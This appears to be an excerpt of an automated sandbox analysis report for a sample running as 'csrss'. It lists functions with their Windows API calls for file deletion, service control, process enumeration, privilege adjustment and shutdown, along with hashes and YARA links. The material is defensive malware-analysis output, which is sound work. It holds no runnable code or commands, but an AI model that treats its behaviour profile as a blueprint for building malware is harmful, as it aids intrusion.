Instruction Fuzzy Hash: 6E4142328083019FD615DB75DD50CAFB7F8AFE0250F10452EB196928A2FF609E4ECA72

Function 33D7AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 33D7AA70

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 62a6ef1214a1767398b4016fe5047ff84c08a34b6a66d653e7f9d22703dfeede
Instruction ID: f1e0db3e3d3fef603cf97c7bffeccabee0b60a79ab3061a5983faecf8a2eb72a
Opcode Fuzzy Hash: 62a6ef1214a1767398b4016fe5047ff84c08a34b6a66d653e7f9d22703dfeede
Instruction Fuzzy Hash: 3101D4B1911358FFEB14CF64C941BAEB7ECFF00729F10856DE445AB600D672A940C7A0

Function 33D86137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 704b81ef18003e25cfd0742a813c0202ba853fe0b55a21afa0d6fbac2c17706a
Instruction ID: 741eed7fc8d5700051b2b762a217ad3174410846fd89246506357365e282615b
Opcode Fuzzy Hash: 704b81ef18003e25cfd0742a813c0202ba853fe0b55a21afa0d6fbac2c17706a
Instruction Fuzzy Hash: 47E06DBA50132DB6E71226669C04B4B779E9F41BF2F490121EED4AE48BDE20F80582F0

Non-executed Functions

Function 33D5D58F Relevance: 18.1, APIs: 12, Instructions: 74windownativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 33D5D5DA
GetCursorPos.USER32(?), ref: 33D5D5E9
SetForegroundWindow.USER32(?), ref: 33D5D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 33D5D60C
Shell_NotifyIcon.SHELL32(00000002,33DB4B48), ref: 33D5D65D
ExitProcess.KERNEL32 ref: 33D5D665
CreatePopupMenu.USER32 ref: 33D5D66B
AppendMenuA.USER32(00000000,00000000,00000000,33DACF4C), ref: 33D5D680

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
String ID:
API String ID: 1665278180-0
Opcode ID: 0d5d7f4e51fe046f8f83683dd149ac9b17d0e437570d6768a2e2a972cb0d2efa
Instruction ID: f82cbba4e4ae452606bdeeff0d54aa9aef7371da7eede5e9ead1e41df485059a
Opcode Fuzzy Hash: 0d5d7f4e51fe046f8f83683dd149ac9b17d0e437570d6768a2e2a972cb0d2efa
Instruction Fuzzy Hash: 2421F8B6501209FFEF06BFA4CD0EE693FB5FB08741F410114F606A50A4DB729962DB68

Function 33D5C291 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 33D5C2EC
FindNextFileW.KERNEL32(00000000,?), ref: 33D5C31C
SetFileAttributesW.KERNEL32(?,00000080), ref: 33D5C38E
DeleteFileW.KERNEL32(?), ref: 33D5C39B

Part of subcall function 33D5C291: RemoveDirectoryW.KERNEL32(?), ref: 33D5C371

GetLastError.KERNEL32 ref: 33D5C3BC
FindClose.KERNEL32(00000000), ref: 33D5C3D2
RemoveDirectoryW.KERNEL32(00000000), ref: 33D5C3D9
FindClose.KERNEL32(00000000), ref: 33D5C3E2

Strings

@{t, xrefs: 33D5C2A2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID: @{t
API String ID: 2341273852-343425482
Opcode ID: 54de38234361651e0b55d4a02276043d5142e6b9acffc67906859544262a1d3e
Instruction ID: 0a8f688fa44c4c5a132872c1c58cd0bb88becca2dd6d66853f47cfdca5327454
Opcode Fuzzy Hash: 54de38234361651e0b55d4a02276043d5142e6b9acffc67906859544262a1d3e
Instruction Fuzzy Hash: B93150B6C0131C9AFF60EBB0CC88EDA77ACAF19210F8406A5F555E7051EF3197998B60

Function 33D59627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON

Download Yara Rule

Strings

7, xrefs: 33D5982A
0, xrefs: 33D59651
5, xrefs: 33D59809
3, xrefs: 33D59754
1, xrefs: 33D59695
2, xrefs: 33D596F4
4, xrefs: 33D597B8
6, xrefs: 33D59813

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: 3a737457222483e27af2b00244548c5d3010bfd223755d08a79cfe8c6b547bb1
Instruction ID: 8c8da067262db9ec79e6ffa02bc04bd0587cd0f1289646cc784b4cf0da404094
Opcode Fuzzy Hash: 3a737457222483e27af2b00244548c5d3010bfd223755d08a79cfe8c6b547bb1
Instruction Fuzzy Hash: F671D0B09083019FE704CF20D8A0BAABBE9AF95750F04491DF596576D0EF74AB4DC7A2

Function 33D5A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,33DB58E8), ref: 33D5A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 33D5A7AD
GetLastError.KERNEL32 ref: 33D5A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 33D5A7F3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 7c6eaa7d91928d6d24bae3f762bf809297a58fa69b2e9ce767f94f9ae5572368
Instruction ID: 36f4dbd14c9397ef8cca71b38586835e70cd02eb9b221134e904f6103f3f6dd6
Opcode Fuzzy Hash: 7c6eaa7d91928d6d24bae3f762bf809297a58fa69b2e9ce767f94f9ae5572368
Instruction Fuzzy Hash: 29816172808305AFD704DF61C894D9FB7E8FF94254F50491DF58692950EF70EA49CBA2

Function 33D532D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 33D53417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 33D53425
GetFileSize.KERNEL32(?,00000000), ref: 33D53432
UnmapViewOfFile.KERNEL32(00000000), ref: 33D53452

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$View$CreateMappingSizeUnmap
String ID:
API String ID: 2708475042-0
Opcode ID: 0d8f92a62166b15e71f4db8d982a2f9c84fa0b8b908fd7e60fb61fabf9c77793
Instruction ID: 7f492be6a8a7c31eaf66069feb21b56be356125ae08dc9888024d1dc43fdaf8f
Opcode Fuzzy Hash: 0d8f92a62166b15e71f4db8d982a2f9c84fa0b8b908fd7e60fb61fabf9c77793
Instruction Fuzzy Hash: 8041CD72A08300BBFB11AF25DC49F1B7AACEF89764F180A19F695E6490EF30C505C672

Function 33D4BB30 Relevance: 12.1, APIs: 8, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 33D4BBAF
FindClose.KERNEL32(00000000), ref: 33D4BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 33D4BCEC
FindClose.KERNEL32(00000000), ref: 33D4BD12

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 1dfbc84fc80e710ba7d06bdb2ffa71ac347c95d8da5668e62a6f4dbdb97cea72
Instruction ID: 5f31886de719ddc37a33a6bba9a7a078b7e0038dda410273459c94405c714c94
Opcode Fuzzy Hash: 1dfbc84fc80e710ba7d06bdb2ffa71ac347c95d8da5668e62a6f4dbdb97cea72
Instruction Fuzzy Hash: 5B514C32D003199FDB14EBB5DD94DEDB778BF10200F904169E417A6892FF305A8ACEA1

Function 33D4BD37 Relevance: 10.6, APIs: 7, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 33D4BDAF
FindClose.KERNEL32(00000000), ref: 33D4BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 33D4BE89
FindClose.KERNEL32(00000000), ref: 33D4BEAF
FindClose.KERNEL32(00000000), ref: 33D4BED0

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Find$Close$File$FirstNext
String ID:
API String ID: 3527384056-0
Opcode ID: fd698a8065435f202077a5e53dcb27bf406a90bb9483a4d194197c94b6cc8d19
Instruction ID: 187bcad064b86abcd8db8034e204dfdb27cc251c3e013c9af4b3320cd5763b30
Opcode Fuzzy Hash: fd698a8065435f202077a5e53dcb27bf406a90bb9483a4d194197c94b6cc8d19
Instruction Fuzzy Hash: 5D418132D04319AEDB04EBB5DD54CEDB7B8EF25210F800169E456A78C1FF315A9ACBA1

Function 33D5AB0D Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 33D5AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 33D5AB33
CloseServiceHandle.ADVAPI32(00000000), ref: 33D5AB40
ControlService.ADVAPI32(00000000,00000001,?), ref: 33D5AB4F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: d3270f6379caeff59afdca76f9091fb777f4d206e56cc0288398da99998ba870
Instruction ID: 3adb4a466221cc5ae469d30b344d73beba63d9acb27d7660a0d276557d68f116
Opcode Fuzzy Hash: d3270f6379caeff59afdca76f9091fb777f4d206e56cc0288398da99998ba870
Instruction Fuzzy Hash: B611A1769502286FFB22BB64CCC9DFF3BADDB466A1B010015F92AE2140DB744D479AF1

Function 33D9243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,33D9275B,?,00000000), ref: 33D924D5
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,33D9275B,?,00000000), ref: 33D924FE
GetACP.KERNEL32(?,?,33D9275B,?,00000000), ref: 33D92513

Strings

ACP, xrefs: 33D9245A
OCP, xrefs: 33D92490

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 79dde2b064d1341029c78c05f0c13395a24529796036acb3d698bb31393af23a
Instruction ID: d05fe9d38238ad89c570ea37029cc09c8dd16c4a4aea8351b3e8af7d9e2187b1
Opcode Fuzzy Hash: 79dde2b064d1341029c78c05f0c13395a24529796036acb3d698bb31393af23a
Instruction Fuzzy Hash: 5E21D77A600209E7F3E4DF74CD01ACB73AAEF54FA4B8A8524E949DB104E732DA40C390

Function 33D92610 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

Part of subcall function 33D88215: _free.LIBCMT ref: 33D88274
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D88281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 33D9271C
IsValidCodePage.KERNEL32(00000000), ref: 33D92777
IsValidLocale.KERNEL32(?,00000001), ref: 33D92786
GetLocaleInfoW.KERNEL32(?,00001001,33D84A6C,00000040,?,33D84B8C,00000055,00000000,?,?,00000055,00000000), ref: 33D927CE
GetLocaleInfoW.KERNEL32(?,00001002,33D84AEC,00000040), ref: 33D927ED

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: ac61275cae35f1543ada33f09e8cdfdd5d98a8b9486cec7dac17b2c8ff7054e1
Instruction ID: be1affdd987c04aa3443927f717f57f8b7d298217313759f3d8e43359c0b40aa
Opcode Fuzzy Hash: ac61275cae35f1543ada33f09e8cdfdd5d98a8b9486cec7dac17b2c8ff7054e1
Instruction Fuzzy Hash: A8518FB6E0020DABFF50DFA4DC80AFE77B8AF18741F540469E954FB190EB709A458B61

Function 33D89365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,33D9F234), ref: 33D893CF
WideCharToMultiByte.KERNEL32(00000000,00000000,33DB2764,000000FF,00000000,0000003F,00000000,?,?), ref: 33D89447
WideCharToMultiByte.KERNEL32(00000000,00000000,33DB27B8,000000FF,?,0000003F,00000000,?), ref: 33D89474
_free.LIBCMT ref: 33D893BD

Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA

_free.LIBCMT ref: 33D89589

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 29d18a31a9c5dc9ad18af58bc9a40c416a579766ac18fa77714bb489c60fd35b
Instruction ID: 08da55867b3a49d19b2f01581789c378831af32e0e9cad237d9c7ffdc5fedc44
Opcode Fuzzy Hash: 29d18a31a9c5dc9ad18af58bc9a40c416a579766ac18fa77714bb489c60fd35b
Instruction Fuzzy Hash: 1E51BC77D00319EFDB00DFB9CC809AEB7FCEF44761B54065AD595AB680E730A9428BA4

Function 33D4F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 33D5BFB7: GetCurrentProcess.KERNEL32(?,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFC8
Part of subcall function 33D5BFB7: IsWow64Process.KERNEL32(00000000,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFCF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 33D4F91B
Process32FirstW.KERNEL32(00000000,?), ref: 33D4F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 33D4F94E
CloseHandle.KERNEL32(00000000), ref: 33D4FB05

Part of subcall function 33D5BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,33D4F5F9,00000000,?,?,33DB5338), ref: 33D5BFFA
Part of subcall function 33D5BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,33DB5338), ref: 33D5C005

Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 33D5C1F5
Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 33D5C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 33D4FAF6

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: d950c15fcf8b5c62db270a37fd39af0306c79c7fd8eb93d1ab487b6600f7281e
Instruction ID: 14007094cda6a940534a79455b0093fa631651ee3a8b98f07441c1bb5043f362
Opcode Fuzzy Hash: d950c15fcf8b5c62db270a37fd39af0306c79c7fd8eb93d1ab487b6600f7281e
Instruction Fuzzy Hash: 274114329083859BD325EB62DC50AFFB3E9BF94300F50492DE58B96591EF305A4BC762

Function 33D4C34D Relevance: 7.6, APIs: 5, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,33DA6C64,00000000), ref: 33D4C39B
FindNextFileW.KERNEL32(00000000,?), ref: 33D4C46E
FindClose.KERNEL32(00000000), ref: 33D4C47D
FindClose.KERNEL32(00000000), ref: 33D4C4A8

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 9b0540f1e9eacbd929f62739c05c323810b066d2a4e6ce1d01278eb5b8ab187e
Instruction ID: 7a10dad61809591dc39e1b5208a331f3063d3c7f97377e289b16ac27a892a326
Opcode Fuzzy Hash: 9b0540f1e9eacbd929f62739c05c323810b066d2a4e6ce1d01278eb5b8ab187e
Instruction Fuzzy Hash: DF318732D0431AAADB14EBB5DD98DFDB77DAF10610F400159E10AA34C1FF74AA8ECA64

Function 33D57952 Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 33D5795F
OpenProcessToken.ADVAPI32(00000000), ref: 33D57966
LookupPrivilegeValueA.ADVAPI32(00000000,33DAC7C8,?), ref: 33D57978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 33D57997
GetLastError.KERNEL32 ref: 33D5799D

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3534403312-0
Opcode ID: 45dab1bd5f053ee36c20c395c3b477b2ebbdf5780e6d8c62ff332b7dec40fa79
Instruction ID: e0dc20fa9323dd10f4adda9a81bf8ea9887398bce31bf6eefebf4d0f9ad37799
Opcode Fuzzy Hash: 45dab1bd5f053ee36c20c395c3b477b2ebbdf5780e6d8c62ff332b7dec40fa79
Instruction Fuzzy Hash: 5DF012B2802129ABEB10ABA4CD4DAEFBFFCEF05215F010050B80AE2040D6344A15CAA1

Function 33D91CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,33D84A73,?,?,?,?,33D844CA,?,00000004), ref: 33D91DBA
_wcschr.LIBVCRUNTIME ref: 33D91E4A
_wcschr.LIBVCRUNTIME ref: 33D91E58
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,33D84A73,00000000,33D84B93), ref: 33D91EFB

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: b6bbf4c923474afebe48ae875db2dea5dd3f45580a6ab29148a9efa51f2697ec
Instruction ID: 955558e54309daaa1629685c1306fd7da03cc9bd9d06df23429343409b6e2dbd
Opcode Fuzzy Hash: b6bbf4c923474afebe48ae875db2dea5dd3f45580a6ab29148a9efa51f2697ec
Instruction Fuzzy Hash: AE61F4BAA00706AAF7159F74CC81BFB73ACEF04750F14056AE949DB980EB70E9018770

Function 33D49665 Relevance: 6.2, APIs: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 33D496E2
FindNextFileW.KERNEL32(00000000,?), ref: 33D4970B
FindClose.KERNEL32(?), ref: 33D49722

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 7a03b93a8fc8a96ed9dfdad14d09a06fb29fd1266462e0de03f59495d3a1d41f
Instruction ID: 6ddc51dad1cb8d745f14aec7103433157c9621e4b5d99fe1124409afda3d46fa
Opcode Fuzzy Hash: 7a03b93a8fc8a96ed9dfdad14d09a06fb29fd1266462e0de03f59495d3a1d41f
Instruction Fuzzy Hash: 34814E72C043199BCB15DFA2DC90DEDB7B8BF14210F54426AE516A7495FF30AB4ACBA0

Function 33D749F9 Relevance: 6.1, APIs: 4, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D74A06
IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 33D74ACE
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 33D74AED
UnhandledExceptionFilter.KERNEL32(?), ref: 33D74AF7

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8a3826ad6b2ea8ad70948c57d0850e3b01c1eea0d02829d35124a8692bdf607b
Instruction ID: 827ddadae5a073193b56797aee10d61f1c979325794ea6e774a6e145117b8302
Opcode Fuzzy Hash: 8a3826ad6b2ea8ad70948c57d0850e3b01c1eea0d02829d35124a8692bdf607b
Instruction Fuzzy Hash: FA3118B6D0222C9BDB20DFA5D9896CDBBF8FF08345F1041AAE40DA7240E7309A85CF55

Function 33D749F8 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D74A06
IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 33D74ACE
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 33D74AED
UnhandledExceptionFilter.KERNEL32(?), ref: 33D74AF7

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7d7f0a932a29e5356213b12092509e082ff8bee4b81043cf391d323f64d7f7e1
Instruction ID: 00555a22d2c3560f49690a830854ba66438718e701933cb72f2b18534a7eb93c
Opcode Fuzzy Hash: 7d7f0a932a29e5356213b12092509e082ff8bee4b81043cf391d323f64d7f7e1
Instruction Fuzzy Hash: 9A3107B6D0222C9BDB20DFA5D9896CDBBF8FF08345F1041AAE40DA7240EB314A85CF51

Function 33D5B4A8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(33DACA14,0000000A,00000000), ref: 33D5B4B9
LoadResource.KERNEL32(00000000,?,?,33D4F3DE,00000000), ref: 33D5B4CD
LockResource.KERNEL32(00000000,?,?,33D4F3DE,00000000), ref: 33D5B4D4
SizeofResource.KERNEL32(00000000,?,?,33D4F3DE,00000000), ref: 33D5B4E3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: e7c1fd18a25f8d7428c8119a564dff62f77c9eafa38e18ccf26031383438e220
Instruction ID: cca9bc47fa508431294b90ac28cd9e4e9a30d951324af0e556448239c2d40f5f
Opcode Fuzzy Hash: e7c1fd18a25f8d7428c8119a564dff62f77c9eafa38e18ccf26031383438e220
Instruction Fuzzy Hash: 3DE01A77200210EBDB213BB5CC4CD463FA9F7C9BA33000465F512B7221DA328406DBA0

Function 33D4880C Relevance: 4.7, APIs: 3, Instructions: 186fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,33DA6608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 33D488CA
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 33D488FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 33D48A15

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: ab937bd930308e850c2806b3f8e9d5d091c9845e74306ced24e70a086022c48c
Instruction ID: a9c9d98116ad11c71d59e57eadde2151deba53ff829cc46f36f59c91dbf666ec
Opcode Fuzzy Hash: ab937bd930308e850c2806b3f8e9d5d091c9845e74306ced24e70a086022c48c
Instruction Fuzzy Hash: 7D519F72C01309AACF04FFB5DD959ED7BB8AF10251F900159E81AA7891FF349B49CBA1

Function 33D567B9 Relevance: 4.6, APIs: 3, Instructions: 96libraryloadershutdownCOMMON

Download Yara Rule

APIs

ExitWindowsEx.USER32(00000000), ref: 33D56856
LoadLibraryA.KERNEL32(33DAC770), ref: 33D5686B
GetProcAddress.KERNEL32(00000000), ref: 33D56872

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: AddressExitLibraryLoadProcWindows
String ID:
API String ID: 1366546845-0
Opcode ID: f7fae72ec85971c7afd66bc01392b3f8641cf2aedeb09f383659a13047cf08b0
Instruction ID: 85d56b8ded39d6e25b6bd9aed338f1ba55b1124a85dab73ef0a62c5074298e53
Opcode Fuzzy Hash: f7fae72ec85971c7afd66bc01392b3f8641cf2aedeb09f383659a13047cf08b0
Instruction Fuzzy Hash: 0C2195B5F443059BEE14FFB5C854AAE27995F91640F84486DB08297AC1EF64C80DC371

